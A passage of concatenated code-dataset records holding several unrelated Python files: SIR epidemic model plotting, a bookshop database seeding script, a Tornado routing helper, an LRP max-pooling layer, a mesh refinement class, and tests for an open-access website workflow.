'SIR':\n beta[i,:] = np.exp(theta[0,:])\n gamma[i,:] = np.exp(theta[1,:])\n elif self.model =='simSIR':\n beta[i,:] = np.exp(theta[0:-1])\n gamma[i,:] = np.exp(theta[-1])*np.ones_like(gamma[i,:]) \n elif self.model == 'hyperSIR':\n beta[i,:] = np.exp(theta[0,:])\n gamma[i,:] = np.exp(theta[1,:])\n alpha[i,:] = hyperParam\n \n self.SIR.model.theta = self.SIR.interpolate_theta(theta)\n self.SIR.model.initCondition= x0\n self.SIR.model.eval()\n active_cases_posterior_samples[i,:] = self.SIR.model.state[1,:]\n total_infections_posterior_samples[i,:] = self.SIR.model.state[1,:] + self.SIR.model.state[2,:]\n f=plt.figure('Active cases')\n uqPlot.quantilePlot(active_cases_posterior_samples, self.SIR.model.time + self.SIR.initT, qtPlot)\n plt.plot(self.SIR.data.confirmed -self.SIR.data.deaths - self.SIR.data.recovered, '*-', label = 'data' )\n plt.legend(fontsize=15)\n plt.xlabel('day', fontsize= 18)\n plt.ylabel('active cases', fontsize= 18)\n f.savefig(self.result_dir+self.model + self.country_region + \"ActiveCases.pdf\", bbox_inches='tight')\n plt.show()\n \n f = plt.figure('Total infected cases')\n uqPlot.quantilePlot(total_infections_posterior_samples, self.SIR.model.time + self.SIR.initT, qtPlot)\n plt.plot(self.SIR.data.confirmed, '*-', label = 'data' )\n plt.legend(fontsize=15)\n plt.xlabel('day', fontsize= 18)\n plt.ylabel('Cumulative infections', fontsize= 18)\n f.savefig(self.result_dir+self.model + self.country_region +\"totalCases.pdf\", bbox_inches='tight')\n plt.show()\n \n f = plt.figure('beta')\n uqPlot.quantilePlot(beta, self.SIR.time_node + self.SIR.initT, qtPlot)\n plt.legend(fontsize=15)\n plt.xlabel('day', fontsize= 18)\n plt.ylabel(r'$\\beta$', fontsize= 18)\n if self.country_region == 'Germany':\n plt.ylim([0.0, 0.8])\n if self.country_region == 'Uruguay':\n plt.ylim([0., 1.])\n if self.country_region == 'Saudi Arabia':\n plt.ylim([0.02, 0.18])\n if 
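`uqPlot.quantilePlot` draws quantile bands over the posterior samples; an approximation of that plot (an assumption about what the helper shows) in plain numpy/matplotlib:

```python
# Shade the central qtPlot-probability band over sample trajectories.
import numpy as np
import matplotlib.pyplot as plt

samples = np.random.default_rng(0).normal(size=(500, 60)).cumsum(axis=1)
t = np.arange(samples.shape[1])
lo, hi = np.quantile(samples, [(1 - 0.95) / 2, 1 - (1 - 0.95) / 2], axis=0)
plt.fill_between(t, lo, hi, alpha=0.3, label="95% band")
plt.plot(t, samples.mean(axis=0), label="mean")
plt.legend()
plt.show()
```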
self.country_region == 'Italy':\n plt.ylim([0, 0.35])\n f.savefig(self.result_dir+self.model + self.country_region +\"beta.pdf\", bbox_inches='tight')\n plt.show()\n \n f = plt.figure('gamma')\n uqPlot.quantilePlot(gamma, self.SIR.time_node + self.SIR.initT, qtPlot)\n plt.legend(fontsize=15)\n plt.xlabel('day', fontsize= 18)\n plt.ylabel(r'$\\gamma$', fontsize= 18)\n if self.country_region == 'Germany':\n plt.ylim([0.0, 0.8])\n if self.country_region == 'Uruguay':\n plt.ylim([0., 0.55])\n if self.country_region == 'Saudi Arabia':\n plt.ylim([0, 0.14])\n if self.country_region == 'Italy':\n plt.ylim([0, 0.1])\n f.savefig(self.result_dir+self.model + self.country_region + \"gamma.pdf\", bbox_inches='tight')\n \n \n if self.model == 'hyperSIR':\n f = plt.figure('alpha')\n uqPlot.kde(alpha[:,0])\n plt.legend()\n plt.xlabel(r'$\\alpha$', fontsize= 18)\n plt.ylabel('pdf', fontsize= 18)\n f.savefig(self.result_dir+self.model + self.country_region + \"alpha.pdf\", bbox_inches='tight')\n plt.show() \n print('end')","sub_path":"postProcessing.py","file_name":"postProcessing.py","file_ext":"py","file_size_in_byte":9478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"184222644","text":"import datetime\n\n__author__ = 'matvei'\n\nfrom bookshop import db\nfrom models.books.models import Author, Book, BookInLibrary\nfrom models.files.models import File\nfrom models.messages.models import Message\nfrom models.news.models import News\nfrom models.users.models import Role, User, Follower\ndb.create_all()\n\nfrom models.books.models import Author, Book, BookInLibrary, Genre, Comment\nfrom models.news.models import News\nfrom models.users.models import User, Role\n\nannotation = 'Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor ' \\\n 'incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud ' \\\n 'exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute ' \\\n 'irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla ' \\\n 'pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia '\n\nrole1 = Role('admin', 'god')\nrole2 = Role('editor', 'can add news books authors')\nrole3 = Role('user', 'slave')\n\ndb.session.add(role1)\ndb.session.add(role2)\ndb.session.add(role3)\ndb.session.commit()\n\nadmin = User('admin', 'admin@example.com', \"11111\", [role1, role2], 'Admin', 'Admin')\nguest = User('guest', 'guest@example.com', \"22222\", [role2, role3], 'User', 'User')\nguest1 = User('matvei', 'a@aa.aaa', \"1\", [role3], 'Matvei', 'Nazaruk')\n\ndb.session.add(admin)\ndb.session.add(guest)\ndb.session.add(guest1)\ndb.session.commit()\n\ncontent1 = 'Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor ' \\\n 'incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud ' \\\n 'exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute ' \\\n 'irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla ' \\\n 'pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia ' \\\n 'deserunt mollit anim id est laborum.'\ncontent2 = 'Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt' \\\n ' ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ' \\\n 'ullamco laboris nisi ut aliquip ex ea commodo consequat. 
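The repeated `db.session.add(...)` calls can be staged in one `add_all` call before the single commit; a sketch using the document's `db` session:

```python
# add_all stages several rows at once; one commit flushes them together.
db.session.add_all([role1, role2, role3])
db.session.commit()
```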
Duis aute irure dolor in reprehenderit' \\\n ' in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat' \\\n ' cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.'\ncontent3 = 'Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt' \\\n ' ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ' \\\n 'ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit' \\\n ' in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat' \\\n ' cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.'\nnews1 = News(\"Lorem ipsum dolor sit amet\", content1, admin.id, main_img='http://www.whydev.org/wp-content/uploads/2014/09/Books.jpg')\nnews2 = News(\"Foo Bar Baz\", content2, admin.id, main_img='http://upload.wikimedia.org/wikipedia/commons/7/76/Urval_av_de_bocker_som_har_vunnit_Nordiska_radets_litteraturpris_under_de_50_ar_som_priset_funnits_(2).jpg')\nnews3 = News(\"news 3333333\", content3, guest.id, main_img='http://static.squarespace.com/static/5148b660e4b030ab54aef81c/t/5473b990e4b0f2adb15dc47c/1416870295741/?format=1000w')\n\ndb.session.add(news1)\ndb.session.add(news2)\ndb.session.add(news3)\ndb.session.commit()\n\nauthor1 = Author(first_name='Jack', last_name='London', country='England')\nauthor2 = Author(first_name='William', last_name='Shakespeare', country='England')\n\ndb.session.add(author2)\ndb.session.add(author1)\ndb.session.commit()\n\ngenre1 = Genre('Sci-fi')\ngenre2 = Genre('Fantasy')\ngenre3 = Genre('Drama')\ngenre4 = Genre('Comic')\n\ndb.session.add(genre1)\ndb.session.add(genre2)\ndb.session.add(genre3)\ndb.session.add(genre4)\ndb.session.commit()\n\nbook1 = Book('Martin Iden', author1.id, \"1900-10\", [genre1], annotation, 'http://www.images-booknode.com/book_cover/4220/full/martin-eden-4220412.jpg')\nbook2 = Book('Beliy Klyk', author1.id, \"1905-1\", [genre2], annotation, 'http://upload.wikimedia.org/wikipedia/commons/1/14/JackLondonwhitefang1.jpg')\nbook3 = Book('Gamlet', author2.id, \"1828-3\", [genre3, genre4], annotation, 'http://th05.deviantart.net/fs70/PRE/i/2012/053/8/a/hamlet_book_cover_complete_by_syrihn-d4qoci9.jpg')\nbook4 = Book('King Lear', author2.id, \"1834-4\", [genre1, genre2], annotation,'http://ecx.images-amazon.com/images/I/51Rg2yW-xXL.jpg')\n\ndb.session.add(book1)\ndb.session.add(book2)\ndb.session.add(book3)\ndb.session.add(book4)\ndb.session.commit()\n\nbook_comment = Comment(book3.id, guest.id, guest.username, 'OMG!!! WTF!!!')\n\ndb.session.add(book_comment)\ndb.session.commit()\n\nuser1_book1 = BookInLibrary(book1.id, admin.id)\nuser1_book2 = BookInLibrary(book3.id, admin.id)\ndb.session.add(user1_book1)\ndb.session.add(user1_book2)\ndb.session.commit()\n","sub_path":"out_date/apps/db_init_fill.py","file_name":"db_init_fill.py","file_ext":"py","file_size_in_byte":5157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"367023336","text":"#!/usr/bin/env python\n#\n# Copyright 2009 Facebook\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. 
You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport tornado.httpserver\nimport tornado.ioloop\nimport inspect, new\nimport tornado.web\n\ndef expose_get(url):\n def wrap(f):\n def wrapped_f(*args):\n f(*args)\n wrapped_f.method = 'get'\n wrapped_f.url = url\n return wrapped_f\n return wrap\n\ndef expose_post(url):\n def wrap(f):\n def wrapped_f(*args):\n f(*args)\n wrapped_f.method = 'post'\n wrapped_f.url = url\n return wrapped_f\n return wrap\n\ndef start_class(obj):\n handlers = []\n obj = obj()\n for name in dir(obj):\n if name[0:2] == '__' or not callable(getattr(obj, name)):\n continue\n func = getattr(obj, name)\n if func.__name__ != expose_post.__name__ and func.__name__ != expose_get.__name__:\n _name = \"EasyRequestHandler-\" + func.url\n methods_dict = { func.method : func }\n _class = new.classobj(_name,(tornado.web.EasyRequestHandler, ), methods_dict)\n handlers.append((func.url, _class))\n return handlers\n\ndef start_module(mod_name):\n handlers = []\n mod = __import__(mod_name)\n for name in dir(mod):\n obj = getattr(mod, name)\n if inspect.isclass(obj):\n if hasattr(obj, 'target'):\n obj.__bases__ = (tornado.web.RequestHandler,)\n handlers.append((obj.target, obj))\n if inspect.isfunction(obj):\n if obj.__name__ != expose_post.__name__ and obj.__name__ != expose_get.__name__ and obj.__name__ != 'start':\n _name = \"Handler-\" + obj.url\n methods_dict = { obj.method : obj }\n _class = new.classobj(_name,(tornado.web.RequestHandler, ), methods_dict)\n handlers.append((obj.url, _class))\n return handlers\n\ndef start(obj, settings={}, port=8888):\n handlers = []\n if inspect.isclass(obj):\n handlers = start_class(obj)\n else:\n handlers = start_module(obj)\n \n application = tornado.web.Application(handlers, **settings)\n http_server = tornado.httpserver.HTTPServer(application)\n http_server.listen(port)\n tornado.ioloop.IOLoop.instance().start()\n\n","sub_path":"tornado/contrib/easy_app.py","file_name":"easy_app.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"235851067","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Function\nfrom torch.autograd import Variable\n\ndef where(condition, x, y):\n return Variable(condition.float()) * x + Variable((condition != 1).float()) * y\n\nclass MaxPool2d(nn.Module):\n def __init__(self, kernel_size):\n super(MaxPool2d, self).__init__()\n self.kernel_size = kernel_size\n self.layer = nn.MaxPool2d(self.kernel_size)\n\n def forward(self, input_tensor):\n self.in_N, self.in_depth, self.in_h, self.in_w = input_tensor.size()\n return self.layer.forward(input_tensor)\n #\n def lrp(self, R, lrp_var=None,param=None):\n if lrp_var is None or lrp_var.lower() == 'none' or lrp_var.lower() == 'simple':\n return self._simple_lrp(R)\n elif lrp_var.lower() == 'alphabeta' or lrp_var.lower() == 'alpha':\n return self._alphabeta_lrp(R, param)\n\n def _simple_lrp(self, R):\n self.check_shape(R)\n\n hpool = wpool = self.layer.kernel_size\n hstride = wstride = self.layer.stride\n\n Rx = 
torch.zeros(self.input.size())\n for i in range(self.Hout):\n for j in range(self.Wout):\n # Z = torch.eq(self.output[:, :, i:i+1, j:j + 1], self.input[:, :, i * hstride:i * hstride + hpool, j * wstride:j * wstride + wpool])\n # Z = where(Z, torch.ones_like(Z.float()), torch.zeros_like(Z.float()))\n Z = self.input[:, :, i * hstride:i * hstride + hpool, j * wstride:j * wstride + wpool]\n Zs = (torch.sum(torch.sum(Z, dim=2, keepdim=True),dim=3, keepdim=True))\n Zs += 1e-12 * where(Zs >= 0, torch.ones_like(Zs), torch.ones_like(Zs) * -1)\n\n Rx[:, :, i * hstride:i * hstride + hpool, j * wstride:j * wstride + wpool] += torch.div(Z, Zs) * self.R[:, :, i:i + 1, j:j + 1]\n return Rx\n\n def _alphabeta_lrp(self,R,alpha):\n return self._simple_lrp(R)\n\n def check_shape(self, R):\n self.R = R\n R_shape = self.R.size()\n output_shape = self.output.size()\n if len(R_shape) != 4:\n self.R = torch.reshape(self.R, output_shape)\n N, NF, self.Hout, self.Wout = self.R.size()","sub_path":"modules/Maxpool.py","file_name":"Maxpool.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"271407793","text":"'''\nClass for refining a mesh from one region to another.\nCreated on April 4, 2018\n\n@author: Richard Christie\n'''\n\nfrom scaffoldmaker.annotation.annotationgroup import AnnotationGroup\nfrom scaffoldmaker.utils.octree import Octree\nfrom scaffoldmaker.utils.zinc_utils import *\nfrom opencmiss.zinc.element import Element, Elementbasis\nfrom opencmiss.zinc.field import Field\nfrom opencmiss.zinc.node import Node\nfrom opencmiss.zinc.result import RESULT_OK as ZINC_OK\n\nclass MeshRefinement:\n '''\n Class for refining a mesh from one region to another.\n '''\n\n def __init__(self, sourceRegion, targetRegion, sourceAnnotationGroups = []):\n '''\n Assumes targetRegion is empty.\n :param sourceAnnotationGroups: List of AnnotationGroup for source mesh in sourceRegion.\n A copy containing the refined elements is created by the MeshRefinement.\n '''\n self._sourceRegion = sourceRegion\n self._sourceFm = sourceRegion.getFieldmodule()\n self._sourceCache = self._sourceFm.createFieldcache()\n self._sourceCoordinates = getOrCreateCoordinateField(self._sourceFm)\n # get range of source coordinates for octree range\n self._sourceFm.beginChange()\n sourceNodes = self._sourceFm.findNodesetByFieldDomainType(Field.DOMAIN_TYPE_NODES)\n minimumsField = self._sourceFm.createFieldNodesetMinimum(self._sourceCoordinates, sourceNodes)\n result, minimums = minimumsField.evaluateReal(self._sourceCache, 3)\n assert result == ZINC_OK, 'MeshRefinement failed to get minimum coordinates'\n maximumsField = self._sourceFm.createFieldNodesetMaximum(self._sourceCoordinates, sourceNodes)\n result, maximums = maximumsField.evaluateReal(self._sourceCache, 3)\n assert result == ZINC_OK, 'MeshRefinement failed to get maximum coordinates'\n xrange = [ (maximums[i] - minimums[i]) for i in range(3) ]\n edgeTolerance = 0.5*(max(xrange))\n if edgeTolerance == 0.0:\n edgeTolerance = 1.0\n minimums = [ (minimums[i] - edgeTolerance) for i in range(3) ]\n maximums = [ (maximums[i] + edgeTolerance) for i in range(3) ]\n minimumsField = None\n maximumsField = None\n self._sourceFm.endChange()\n self._sourceMesh = self._sourceFm.findMeshByDimension(3)\n self._sourceElementiterator = self._sourceMesh.createElementiterator()\n self._octree = Octree(minimums, maximums)\n\n self._targetRegion = targetRegion\n self._targetFm = targetRegion.getFieldmodule()\n 
self._targetFm.beginChange()\n self._targetCache = self._targetFm.createFieldcache()\n self._targetCoordinates = getOrCreateCoordinateField(self._targetFm)\n\n self._targetNodes = self._targetFm.findNodesetByFieldDomainType(Field.DOMAIN_TYPE_NODES)\n self._nodetemplate = self._targetNodes.createNodetemplate()\n self._nodetemplate.defineField(self._targetCoordinates)\n\n self._targetMesh = self._targetFm.findMeshByDimension(3)\n self._targetBasis = self._targetFm.createElementbasis(3, Elementbasis.FUNCTION_TYPE_LINEAR_LAGRANGE)\n self._targetEft = self._targetMesh.createElementfieldtemplate(self._targetBasis)\n self._targetElementtemplate = self._targetMesh.createElementtemplate()\n self._targetElementtemplate.setElementShapeType(Element.SHAPE_TYPE_CUBE)\n result = self._targetElementtemplate.defineField(self._targetCoordinates, -1, self._targetEft)\n\n self._nodeIdentifier = 1\n self._elementIdentifier = 1\n\n self._annotationGroups = []\n self._sourceAndTargetMeshGroups = []\n for sourceAnnotationGroup in sourceAnnotationGroups:\n sourceMeshGroup = sourceAnnotationGroup.getMeshGroup(self._sourceMesh)\n targetAnnotationGroup = AnnotationGroup(self._targetRegion, \\\n sourceAnnotationGroup.getName(), sourceAnnotationGroup.getFMANumber(), sourceAnnotationGroup.getLyphID())\n targetMeshGroup = targetAnnotationGroup.getMeshGroup(self._targetMesh)\n self._annotationGroups.append(targetAnnotationGroup)\n self._sourceAndTargetMeshGroups.append( ( sourceMeshGroup, targetMeshGroup) )\n\n def __del__(self):\n self._targetFm.endChange()\n\n def getAnnotationGroups(self):\n return self._annotationGroups\n\n def refineElementCubeStandard3d(self, sourceElement, numberInXi1, numberInXi2, numberInXi3):\n meshGroups = []\n for sourceAndTargetMeshGroup in self._sourceAndTargetMeshGroups:\n if sourceAndTargetMeshGroup[0].containsElement(sourceElement):\n meshGroups.append(sourceAndTargetMeshGroup[1])\n # create nodes\n nids = []\n xi = [ 0.0, 0.0, 0.0 ]\n for k in range(numberInXi3 + 1):\n xi[2] = k/numberInXi3\n for j in range(numberInXi2 + 1):\n xi[1] = j/numberInXi2\n for i in range(numberInXi1 + 1):\n xi[0] = i/numberInXi1\n self._sourceCache.setMeshLocation(sourceElement, xi)\n result, x = self._sourceCoordinates.evaluateReal(self._sourceCache, 3)\n nodeId = self._octree.findObjectByCoordinates(x)\n if nodeId is None:\n node = self._targetNodes.createNode(self._nodeIdentifier, self._nodetemplate)\n self._targetCache.setNode(node)\n result = self._targetCoordinates.setNodeParameters(self._targetCache, -1, Node.VALUE_LABEL_VALUE, 1, x)\n nodeId = self._nodeIdentifier\n self._octree.addObjectAtCoordinates(x, nodeId)\n self._nodeIdentifier += 1\n nids.append(nodeId)\n # create elements\n for k in range(numberInXi3):\n ok = (numberInXi2 + 1)*(numberInXi1 + 1)\n for j in range(numberInXi2):\n oj = (numberInXi1 + 1)\n for i in range(numberInXi1):\n bni = k*ok + j*oj + i\n element = self._targetMesh.createElement(self._elementIdentifier, self._targetElementtemplate)\n enids = [ nids[bni ], nids[bni + 1], nids[bni + oj], nids[bni + oj + 1],\n nids[bni + ok], nids[bni + ok + 1], nids[bni + ok + oj], nids[bni + ok + oj + 1] ]\n result = element.setNodesByIdentifier(self._targetEft, enids)\n #if result != ZINC_OK:\n #print('Element', self._elementIdentifier, result, enids)\n self._elementIdentifier += 1\n\n for meshGroup in meshGroups:\n meshGroup.addElement(element)\n\n\n def refineAllElementsCubeStandard3d(self, numberInXi1, numberInXi2, numberInXi3):\n element = self._sourceElementiterator.next()\n while 
element.isValid():\n self.refineElementCubeStandard3d(element, numberInXi1, numberInXi2, numberInXi3)\n element = self._sourceElementiterator.next()\n","sub_path":"scaffoldmaker/utils/meshrefinement.py","file_name":"meshrefinement.py","file_ext":"py","file_size_in_byte":7060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"604799795","text":"# Copyright 2021 Curtin University\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Author: James Diprose, Aniek Roelofs\n\nimport os\nfrom typing import List, Dict\nfrom unittest import TestCase\nfrom unittest.mock import patch\n\nimport jsonlines\nimport pandas as pd\nimport pendulum\nimport vcr\nfrom airflow.models.connection import Connection\nfrom airflow.utils.state import State\nfrom click.testing import CliRunner\n\nimport academic_observatory_workflows.workflows.oa_web_workflow\nfrom academic_observatory_workflows.config import schema_folder, test_fixtures_folder\nfrom academic_observatory_workflows.tests.test_zenodo import MockZenodo\nfrom academic_observatory_workflows.workflows.oa_web_workflow import (\n Description,\n OaWebWorkflow,\n OaWebRelease,\n clean_ror_id,\n clean_url,\n fetch_institution_logo,\n make_logo_url,\n val_empty,\n make_entity_stats,\n Entity,\n PublicationStats,\n EntityStats,\n EntityHistograms,\n Histogram,\n load_data,\n preprocess_index_df,\n preprocess_data_df,\n make_index_df,\n make_entities,\n save_entities,\n update_index_with_logos,\n update_df_with_percentages,\n make_index,\n save_json,\n load_data_glob,\n save_jsonl_gz,\n)\nfrom observatory.platform.bigquery import bq_find_schema\nfrom observatory.platform.files import load_jsonl\nfrom observatory.platform.gcs import gcs_upload_file\nfrom observatory.platform.observatory_config import Workflow\nfrom observatory.platform.observatory_environment import (\n ObservatoryEnvironment,\n ObservatoryTestCase,\n Table,\n bq_load_tables,\n make_dummy_dag,\n)\n\nacademic_observatory_workflows.workflows.oa_web_workflow.INCLUSION_THRESHOLD = {\"country\": 0, \"institution\": 0}\n\n\nclass TestFunctions(TestCase):\n def test_val_empty(self):\n # Empty list\n self.assertTrue(val_empty([]))\n\n # Non empty list\n self.assertFalse(val_empty([1, 2, 3]))\n\n # None\n self.assertTrue(val_empty(None))\n\n # Empty string\n self.assertTrue(val_empty(\"\"))\n\n # Non Empty string\n self.assertFalse(val_empty(\"hello\"))\n\n def test_clean_ror_id(self):\n actual = clean_ror_id(\"https://ror.org/02n415q13\")\n expected = \"02n415q13\"\n self.assertEqual(actual, expected)\n\n def test_clean_url(self):\n url = \"https://www.auckland.ac.nz/en.html\"\n expected = \"https://www.auckland.ac.nz/\"\n actual = clean_url(url)\n self.assertEqual(expected, actual)\n\n def test_make_logo_url(self):\n expected = \"logos/country/s/1234.jpg\"\n actual = make_logo_url(entity_type=\"country\", entity_id=\"1234\", size=\"s\", fmt=\"jpg\")\n self.assertEqual(expected, actual)\n\n 
@patch(\"academic_observatory_workflows.workflows.oa_web_workflow.make_logo_url\")\n def test_get_institution_logo(self, mock_make_url):\n mock_make_url.return_value = \"logo_path\"\n mock_clearbit_ref = \"academic_observatory_workflows.workflows.oa_web_workflow.clearbit_download_logo\"\n\n def download_logo(company_url, file_path, size, fmt):\n if not os.path.isdir(os.path.dirname(file_path)):\n os.makedirs(os.path.dirname(file_path))\n with open(file_path, \"w\") as f:\n f.write(\"foo\")\n\n ror_id, url, size, width, fmt, build_path = \"ror_id\", \"url.com\", \"size\", 10, \"fmt\", \"build_path\"\n with CliRunner().isolated_filesystem():\n # Test when logo file does not exist yet and logo download fails\n with patch(mock_clearbit_ref) as mock_clearbit_download:\n actual_ror_id, actual_logo_path = fetch_institution_logo(ror_id, url, size, width, fmt, build_path)\n self.assertEqual(ror_id, actual_ror_id)\n self.assertEqual(\"unknown.svg\", actual_logo_path)\n mock_clearbit_download.assert_called_once_with(\n company_url=url,\n file_path=\"build_path/images/logos/institution/size/ror_id.fmt\",\n size=width,\n fmt=fmt,\n )\n mock_make_url.assert_not_called()\n\n mock_make_url.reset_mock()\n\n # Test when logo file does not exist yet and logo is downloaded successfully\n with patch(mock_clearbit_ref, wraps=download_logo) as mock_clearbit_download:\n actual_ror_id, actual_logo_path = fetch_institution_logo(ror_id, url, size, width, fmt, build_path)\n self.assertEqual(ror_id, actual_ror_id)\n self.assertEqual(\"logo_path\", actual_logo_path)\n mock_clearbit_download.assert_called_once_with(\n company_url=url,\n file_path=\"build_path/images/logos/institution/size/ror_id.fmt\",\n size=width,\n fmt=fmt,\n )\n mock_make_url.assert_called_once_with(entity_type=\"institution\", entity_id=ror_id, size=size, fmt=fmt)\n\n mock_make_url.reset_mock()\n\n # Test when logo file already exists\n with patch(mock_clearbit_ref, wraps=download_logo) as mock_clearbit_download:\n actual_ror_id, actual_logo_path = fetch_institution_logo(ror_id, url, size, width, fmt, build_path)\n self.assertEqual(ror_id, actual_ror_id)\n self.assertEqual(\"logo_path\", actual_logo_path)\n mock_clearbit_download.assert_not_called()\n mock_make_url.assert_called_once_with(entity_type=\"institution\", entity_id=ror_id, size=size, fmt=fmt)\n\n def test_make_entity_stats(self):\n \"\"\"Test make_entity_stats\"\"\"\n\n # Input figures for multiple entities\n p_outputs_open = [100, 50, 30]\n n_outputs = [10, 100, 1000]\n n_outputs_open = [10, 100, 1000]\n entities = [\n Entity(\n \"\",\n \"\",\n Description(\"\", \"\"),\n stats=PublicationStats(\n p_outputs_open=p_outputs_open_, n_outputs=n_outputs_, n_outputs_open=n_outputs_open_\n ),\n )\n for p_outputs_open_, n_outputs_, n_outputs_open_ in zip(p_outputs_open, n_outputs, n_outputs_open)\n ]\n stats = make_entity_stats(entities)\n expected_stats = EntityStats(\n 3,\n min=PublicationStats(p_outputs_open=30.0, n_outputs=10, n_outputs_open=10),\n max=PublicationStats(p_outputs_open=100.0, n_outputs=1000, n_outputs_open=1000),\n median=PublicationStats(p_outputs_open=50),\n histograms=EntityHistograms(\n p_outputs_open=Histogram(data=[2, 0, 1], bins=[30.0, 53.33333333333333, 76.66666666666666, 100.0]),\n n_outputs=Histogram(data=[1, 1, 1], bins=[1.0, 1.6666666666666665, 2.333333333333333, 3.0]),\n n_outputs_open=Histogram(data=[1, 1, 1], bins=[1.0, 1.6666666666666665, 2.333333333333333, 3.0]),\n ),\n )\n self.assertEqual(expected_stats, stats)\n\n\ndef load_index_and_data(entity_type: str, 
index: List[Dict], data: List[Dict]):\n df_index = pd.DataFrame(index)\n preprocess_index_df(entity_type, df_index)\n\n df_data = pd.DataFrame(data)\n preprocess_data_df(entity_type, df_data)\n\n df_index = make_index_df(entity_type, df_index, df_data)\n\n return df_index, df_data\n\n\nclass TestOaWebWorkflow(ObservatoryTestCase):\n maxDiff = None\n dt_fmt = \"YYYY-MM-DD\"\n\n def setUp(self) -> None:\n \"\"\"TestOaWebWorkflow checks that the workflow functions correctly, i.e. outputs the correct files, but doesn't\n check that the calculations are correct (data correctness is tested in TestOaWebRelease).\"\"\"\n\n # For Airflow unit tests\n self.project_id = os.getenv(\"TEST_GCP_PROJECT_ID\")\n self.data_location = os.getenv(\"TEST_GCP_DATA_LOCATION\")\n self.oa_web_fixtures = \"oa_web_workflow\"\n\n # For testing workflow functions\n self.dag_id = \"oa_web_workflow\"\n self.data_bucket_name = \"data-bucket-name\"\n self.conceptrecid = 1055172\n # self.release = OaWebRelease(dag_id=\"dag\", snapshot_date=pendulum.now(), data_bucket_name=)\n # self.workflow = OaWebWorkflow(dag_id=self.dag_id, input_project_id=self.project_id, output_project_id=self.project_id)\n repositories = [\n {\"id\": \"PubMed Central\", \"total_outputs\": 15, \"category\": \"Domain\", \"home_repo\": False},\n {\"id\": \"Europe PMC\", \"total_outputs\": 12, \"category\": \"Domain\", \"home_repo\": False},\n {\"id\": \"arXiv\", \"total_outputs\": 10, \"category\": \"Preprint\", \"home_repo\": False},\n ]\n self.country_index = [\n {\n \"id\": \"NZL\",\n \"name\": \"New Zealand\",\n \"wikipedia_url\": \"https://en.wikipedia.org/wiki/New_Zealand\",\n \"subregion\": \"Australia and New Zealand\",\n \"region\": \"Oceania\",\n \"alpha2\": \"NZ\",\n },\n ]\n # The n_ fields are strings because BigQuery exports integers as strings in JSON Lines exports\n self.country_data = [\n {\n \"id\": \"NZL\",\n \"year\": \"2020\",\n \"n_citations\": \"121\",\n \"n_outputs\": \"100\",\n \"n_outputs_open\": \"48\",\n \"n_outputs_publisher_open\": \"37\",\n \"n_outputs_publisher_open_only\": \"11\",\n \"n_outputs_both\": \"26\",\n \"n_outputs_other_platform_open\": \"37\",\n \"n_outputs_other_platform_open_only\": \"11\",\n \"n_outputs_closed\": \"52\",\n \"n_outputs_black\": \"90\",\n \"n_outputs_oa_journal\": \"19\",\n \"n_outputs_hybrid\": \"10\",\n \"n_outputs_no_guarantees\": \"8\",\n \"n_outputs_preprint\": \"10\",\n \"n_outputs_domain\": \"27\",\n \"n_outputs_institution\": \"0\",\n \"n_outputs_public\": \"0\",\n \"n_outputs_other_internet\": \"0\",\n \"repositories\": repositories,\n },\n {\n \"id\": \"NZL\",\n \"year\": 2021,\n \"n_citations\": \"233\",\n \"n_outputs\": \"100\",\n \"n_outputs_open\": \"45\",\n \"n_outputs_publisher_open\": \"37\",\n \"n_outputs_publisher_open_only\": \"14\",\n \"n_outputs_both\": \"23\",\n \"n_outputs_other_platform_open\": \"31\",\n \"n_outputs_other_platform_open_only\": \"8\",\n \"n_outputs_closed\": \"55\",\n \"n_outputs_black\": \"90\",\n \"n_outputs_oa_journal\": \"20\",\n \"n_outputs_hybrid\": \"9\",\n \"n_outputs_no_guarantees\": \"8\",\n \"n_outputs_preprint\": 